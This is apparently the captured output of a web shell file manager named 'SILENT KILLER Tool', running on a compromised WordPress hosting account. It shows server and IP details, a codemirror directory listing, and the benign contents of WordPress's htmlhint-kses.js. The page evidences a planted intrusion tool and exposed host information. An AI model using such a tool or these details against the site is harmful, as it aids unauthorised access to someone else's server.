Current Path: > home > codekrsu > > ameliagraphics.com > wp-includes > > js > > codemirror > >
Operation : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Software : Apache Server IP : 162.0.232.56 | Your IP: 216.73.216.111 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
codemirror.min.css | File | 15899 bytes | September 13 2017 10:08:48. | |
codemirror.min.js | File | 585414 bytes | September 13 2017 10:08:48. | |
csslint.js | File | 366769 bytes | October 25 2019 20:38:08. | |
esprima.js | File | 283149 bytes | January 23 2018 06:29:32. | |
fakejshint.js | File | 1002 bytes | January 23 2018 06:29:32. | |
htmlhint-kses.js | File | 984 bytes | September 13 2017 10:08:48. | |
htmlhint.js | File | 17735 bytes | September 13 2017 10:08:48. | |
jsonlint.js | File | 16189 bytes | September 13 2017 10:08:48. |
/* global HTMLHint */ /* eslint no-magic-numbers: ["error", { "ignore": [0, 1] }] */ HTMLHint.addRule({ id: 'kses', description: 'Element or attribute cannot be used.', init: function( parser, reporter, options ) { 'use strict'; var self = this; parser.addListener( 'tagstart', function( event ) { var attr, col, attrName, allowedAttributes, i, len, tagName; tagName = event.tagName.toLowerCase(); if ( ! options[ tagName ] ) { reporter.error( 'Tag <' + event.tagName + '> is not allowed.', event.line, event.col, self, event.raw ); return; } allowedAttributes = options[ tagName ]; col = event.col + event.tagName.length + 1; for ( i = 0, len = event.attrs.length; i < len; i++ ) { attr = event.attrs[ i ]; attrName = attr.name.toLowerCase(); if ( ! allowedAttributes[ attrName ] ) { reporter.error( 'Tag attribute [' + attr.raw + ' ] is not allowed.', event.line, col + attr.index, self, attr.raw ); } } }); } });
SILENT KILLER Tool